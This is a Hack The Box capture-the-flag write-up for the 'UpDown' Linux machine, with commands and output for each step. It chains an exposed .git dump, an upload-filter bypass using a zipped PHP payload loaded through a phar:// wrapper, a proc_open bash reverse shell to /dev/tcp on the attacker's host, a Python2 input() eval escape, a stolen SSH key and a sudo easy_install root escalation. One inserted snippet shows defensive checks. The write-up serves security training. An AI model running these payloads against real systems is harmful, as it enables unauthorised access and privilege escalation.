#hackthebox #medium #linux #tjnull

![[Pasted image 20250806165015.png]]

# Information Gathering - Nmap

I scanned all TCP ports and discovered 2 open ports: 22 and 80.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 17:39 UTC
Nmap scan report for 10.10.11.177
Host is up (0.061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 17.47 seconds
```

I performed one more TCP scan, this time only against ports 22 and 80.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 17:43 UTC
Nmap scan report for 10.10.11.177
Host is up (0.049s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
|   256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_  256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Is my Website up ?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.61 seconds
```

Lastly, I scanned the top 10 UDP ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 17:44 UTC
Nmap scan report for 10.10.11.177
Host is up (0.048s latency).

PORT     STATE         SERVICE
53/udp   open|filtered domain
67/udp   closed        dhcps
123/udp  closed        ntp
135/udp  closed        msrpc
137/udp  closed        netbios-ns
138/udp  closed        netbios-dgm
161/udp  closed        snmp
445/udp  open|filtered microsoft-ds
631/udp  closed        ipp
1434/udp closed        ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 6.37 seconds
```

---

# Enumeration

##### HTTP - TCP 80

It's a page that tells you whether a website is up and running or down.

![[Pasted image 20250806124741.png]]

Mapped `siteisup.htb` to the IP address in the `/etc/hosts` file.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo "http://10.10.11.177 siteisup.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
http://10.10.11.177 siteisup.htb
```

![[Pasted image 20250806125724.png]]

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.177 - - [06/Aug/2025 17:56:28] "GET / HTTP/1.1" 200 -
10.10.11.177 - - [06/Aug/2025 17:57:30] "GET / HTTP/1.1" 200 -
```

![[Pasted image 20250806125737.png]]

I turned `Debug mode` on and checked again. It shows the HTTP headers of the request and lists every file available in that directory.

![[Pasted image 20250806130326.png]]

Burp shows the same thing.

![[Pasted image 20250806130035.png]]

`ffuf` discovers 1 valid subdomain: `dev.siteisup.htb`. I'll also add that to the `/etc/hosts` file.

![[Pasted image 20250806132151.png]]

However, `dev.siteisup.htb` returns `403 Forbidden`.

![[Pasted image 20250806143514.png]]

I manually found `.git` under `/dev`, because my go-to wordlists do not contain `.git`.

![[Pasted image 20250806133907.png]]

`git-dumper` downloads all the source code to the `git_loot` directory.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ git-dumper http://siteisup.htb/dev/.git git_loot
[-] Testing http://siteisup.htb/dev/.git/HEAD [200]
[-] Testing http://siteisup.htb/dev/.git/ [200]
[-] Fetching .git recursively
...
<SNIP>
```

The commit history of the dumped repository:

```bash
commit 010dcc30cc1e89344e2bdbd3064f61c772d89a34 (HEAD -> main, origin/main, origin/HEAD)
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 19:38:51 2021 +0200

    Delete index.php

commit c8fcc4032487eaf637d41486eb150b7182ecd1f1
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 19:38:08 2021 +0200

    Update checker.php

commit f67efd00c10784ae75bd251add3d52af50d7addd
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 18:33:11 2021 +0200

    Create checker.php

commit ab9bc164b4103de3c12ac97152e6d63040d5c4c6
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 18:30:58 2021 +0200

    Update changelog.txt

commit 60d2b3280d5356fe0698561e8ef8991825fec6cb
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 18:30:39 2021 +0200

    Create admin.php

commit c1998f8fbe683dd0bee8d94167bb896bd926c4c7
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 18:29:45 2021 +0200

    Add admin panel.

commit 35a380176ff228067def9c2ecc52ccfe705de640
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 17:40:49 2021 +0200

    Create changelog.txt

commit 4fb192727c29c158a659911aadcdcc23e4decec5
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 15:28:26 2021 +0200

    Create stylesheet.css

commit 6f89af70fd23819664dd28d764f13efc02ecfd88
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 15:05:40 2021 +0200

    Create index.php

commit 8d1beb1cf5a1327c4cdb271b8efb1599b1b1c87f
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 15:05:08 2021 +0200

    Create .htpasswd

commit 6ddcc7a8ac393edb7764788c0cbc13a7a521d372
Author: Abdou.Y <[email protected]>
Date:   Wed Oct 20 15:04:38 2021 +0200

    Create .htaccess
```

Found this inside the `.htaccess` file. `SetEnvIfNoCase` sets the `Required-Header` environment variable when the request carries `Special-Dev: only4dev`, and everything else is denied, so I think it's telling me to add `Special-Dev: only4dev` to the request headers.

```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ cat .htaccess
SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Order Deny,Allow
Deny from All
Allow from env=Required-Header
```

Once I added the `Special-Dev` header to the request, the server returned `200 OK`.
![[Pasted image 20250806143716.png]]

In the Burp settings, I have added `Special-Dev: only4dev` so that every request I make through Burp automatically carries that header.

![[Pasted image 20250806144606.png]]

After applying the new settings, I navigated to `dev.siteisup.htb` and it no longer returned `Forbidden`, but a new web page with a file upload feature. Also, in the top left, it says `This is only for developers` and that it's currently in `beta`.

![[Pasted image 20250806144812.png]]

I tried uploading the `php-reverse-shell.php` file, but it returned `Extension not allowed!`

![[Pasted image 20250806145251.png]]

I revisited the source code we dumped using `git-dumper`; `checker.php` is the file that enforces the upload conditions. We can see that it blocks any file extension that contains the word `php`.

![[Pasted image 20250806145718.png]]

With the payload renamed to `shell.phar`, it didn't error this time with "Extension not allowed".

![[Pasted image 20250806150124.png]]

However, when I navigated into the newly created folder in `/uploads`, nothing was there.

![[Pasted image 20250806151623.png]]
![[Pasted image 20250806151631.png]]

I suspect that's because of this code, which deletes all the uploaded files after checking them.

![[Pasted image 20250806151721.png]]

I renamed my payload back to `shell.php`, compressed it as a zip file and named it `shell.jpeg`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ mv shell.phar shell.php

┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.jpeg shell.php
  adding: shell.php (deflated 59%)
```

As you can see, the `.jpeg` file is not deleted.

![[Pasted image 20250806151947.png]]

However, it fails to execute the webshell.

![[Pasted image 20250806152034.png]]

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ vim shell.php

┌──(kali㉿kali)-[~/Desktop]
└─$ cat shell.php
<?php system($_GET["cmd"]); ?>

┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.jpeg shell.php
  adding: shell.php (stored 0%)
```

I used a `php wrapper` technique to include my payload, but it still failed.
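As an added, defensive illustration (not the box's `checker.php` or any code from this writeup): the "extension contains `php`" blocklist the checker uses placed beside an allowlist, plus a `?page=` include resolved from a fixed map so that a stream wrapper or path traversal in the parameter can never reach `uploads/`. Function names and the allowed extensions are assumptions.

```php
<?php
// Added example, not the UpDown box's checker.php. Shows why the blocklist
// described in the writeup is weak and what the hardened checks look like.
// ALLOWED_EXT, blocklistCheck, allowlistCheck and resolvePage are assumed names.

const ALLOWED_EXT = ['txt', 'csv'];   // what an uptime checker actually needs

// Blocklist as the writeup describes it: any extension containing "php" is
// refused. Every other extension, including archive-like names, is accepted.
function blocklistCheck(string $filename): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return strpos($ext, 'php') === false;
}

// Allowlist: the extension must exactly match one expected value.
function allowlistCheck(string $filename): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true);
}

// Resolve ?page= through a fixed map. The parameter is only ever used as a
// key, never as part of a path, so phar://, php:// or ../ cannot steer the
// include towards files in the uploads directory.
function resolvePage(string $page): string
{
    $pages = [
        'index' => __DIR__ . '/pages/index.php',
        'about' => __DIR__ . '/pages/about.php',
    ];
    return $pages[$page] ?? $pages['index'];   // unknown keys fall back to index
}

// Constructed sample names to compare the two checks side by side.
foreach (['list.txt', 'list.phar', 'list.php', 'list.pHp5'] as $name) {
    printf("%-10s blocklist=%-6s allowlist=%s\n", $name,
        blocklistCheck($name) ? 'pass' : 'reject',
        allowlistCheck($name) ? 'pass' : 'reject');
}
echo resolvePage('phar://uploads/x.jpeg/x'), PHP_EOL;
```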
I'll attempt to look up `phpinfo` and see how the server is configured.

![[Pasted image 20250806152900.png]]

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat shell.php
<?php phpinfo() ?>

┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.jpeg shell.php
  adding: shell.php (stored 0%)
```

`http://dev.siteisup.htb/?page=phar://uploads/889285754fc9d306daaa0e2e2f218169/shell.jpeg/shell` finally returned the `phpinfo()` page.

![[Pasted image 20250806153413.png]]

It reveals that a lot of functions are disabled, including `system` and `exec`.

![[Pasted image 20250806153641.png]]

I am going to use `dfunc-bypasser.py` to discover what alternatives I can use to get command execution. It kept failing, until I remembered that I have to add the `Special-Dev` header.

![[Pasted image 20250806154956.png]]

`dfunc-bypasser` verifies that we can use the `proc_open` function.

![[Pasted image 20250806155235.png]]

Created a reverse shell using the `proc_open` function.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat shell.php
<?php
$cmd = "bash -c 'bash -i >& /dev/tcp/10.10.14.14/443 0>&1'";
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("pipe", "w")
);
$process = proc_open($cmd, $descriptorspec, $pipes);
?>

┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.jpeg shell.php
  adding: shell.php (deflated 37%)
```

Finally got a shell as `www-data`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.177] 43444
bash: cannot set terminal process group (922): Inappropriate ioctl for device
bash: no job control in this shell
www-data@updown:/var/www/dev$ whoami
whoami
www-data
www-data@updown:/var/www/dev$
```

# Privilege Escalation - shell as `developer`

Found `user.txt` in `/home/developer`, but it cannot be read with the current user's privileges.
```bash
www-data@updown:/home/developer$ ls -l
total 8
drwxr-x--- 2 developer www-data 4096 Jun 22  2022 dev
-rw-r----- 1 root      developer  33 Aug  6 17:36 user.txt
```

Inside `/home/developer/dev`, the `siteisup` file has the SUID bit set. It appears to run the `siteisup_test.py` file.

![[Pasted image 20250806163225.png]]

`siteisup_test.py` seems to be written in `Python2`, where `input()` has a major weakness: it takes the user's input and passes it to `eval()`, so whatever expression we type as input is executed.

```bash
www-data@updown:/home/developer/dev$ cat siteisup_test.py
import requests

url = input("Enter URL here:")

page = requests.get(url)
if page.status_code == 200:
	print "Website is up"
else:
	print "Website is down"www-data@updown:/home/developer/dev
```

Successfully got a shell as `developer`.

```bash
www-data@updown:/home/developer/dev$ ls
siteisup  siteisup_test.py
www-data@updown:/home/developer/dev$ ./siteisup
Welcome to 'siteisup.htb' application

Enter URL here:__import__('os').system('bash')
developer@updown:/home/developer/dev$ whoami
developer
```

# Privilege Escalation - shell as `root`

Even though I got a shell as `developer`, I still could not read the `user.txt` file: the group is still `www-data`, and the file is only readable by root and the `developer` group.

```bash
developer@updown:/home/developer$ id
uid=1002(developer) gid=33(www-data) groups=33(www-data)
developer@updown:/home/developer$ cat user.txt
cat: user.txt: Permission denied
```

I copied the private key from `/home/developer/.ssh` and logged into the SSH server with it.

```bash
developer@updown:/home/developer/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub
```

Got `user.txt`.

```bash
developer@updown:~$ id
uid=1002(developer) gid=1002(developer) groups=1002(developer)
developer@updown:~$ cat user.txt
610...
```

User `developer` can run the `/usr/local/bin/easy_install` command with `sudo`, and no password is required.
```bash
developer@updown:/home/developer/dev$ sudo -l
Matching Defaults entries for developer on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User developer may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/local/bin/easy_install
```

I referred to `GTFOBins` for the `easy_install` exploit.

```bash
developer@updown:~$ TF=$(mktemp -d)
developer@updown:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
developer@updown:~$ sudo easy_install $TF
WARNING: The easy_install command is deprecated and will be removed in a future version.
Processing tmp.PgqnvDp3QD
Writing /tmp/tmp.PgqnvDp3QD/setup.cfg
Running setup.py -q bdist_egg --dist-dir /tmp/tmp.PgqnvDp3QD/egg-dist-tmp-KvASUn
# whoami
root
```

Found `root.txt`.

```bash
# cd /root
# cat root.txt
e643...
```